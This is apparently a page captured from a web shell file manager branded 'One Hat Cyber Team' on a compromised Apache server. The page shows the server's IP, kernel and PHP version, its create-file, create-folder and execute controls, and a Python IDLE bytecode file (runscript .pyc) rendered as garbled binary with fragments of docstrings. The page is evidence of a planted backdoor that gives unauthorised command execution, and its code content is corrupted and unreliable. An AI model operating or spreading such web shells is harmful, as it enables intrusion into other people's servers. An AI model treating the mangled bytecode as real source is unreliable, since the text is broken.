⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.237
Server IP:
97.74.87.16
Server:
Linux 16.87.74.97.host.secureserver.net 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
python38
/
lib
/
python3.8
/
idlelib
/
__pycache__
/
View File Name :
runscript.cpython-38.opt-1.pyc
U ����S�@� @ s� d Z ddlZddlZddlZddlmZ ddlmZ ddl m Z ddl mZ ddlm Z ddl mZ dZG d d � d �Zedkr�ddlmZ ed dd� dS )a� Execute code from an editor. Check module: do a full syntax check of the current module. Also run the tabnanny to catch any inconsistent tabs. Run module: also execute the module's code in the __main__ namespace. The window must have been saved previously. The module is added to sys.modules, and is also added to the __main__ namespace. TODO: Specify command line arguments in a dialog box. � N)�idleConf)�macosx)�pyshell)� CustomRun)�outwina/ Error: Inconsistent indentation detected! 1) Your indentation is outright incorrect (easy to fix), OR 2) Your indentation mixes tabs and spaces. To fix case 2, change all tabs to spaces by using Edit->Select All followed by Format->Untabify Region and specify the number of columns used by each tab. c @ sb e Zd Zdd� Zdd� Zdd� Zdd� Zd d � Zdd� Zd d�dd�Z dd� Z dd� Zdd� ZdS )� ScriptBindingc C s>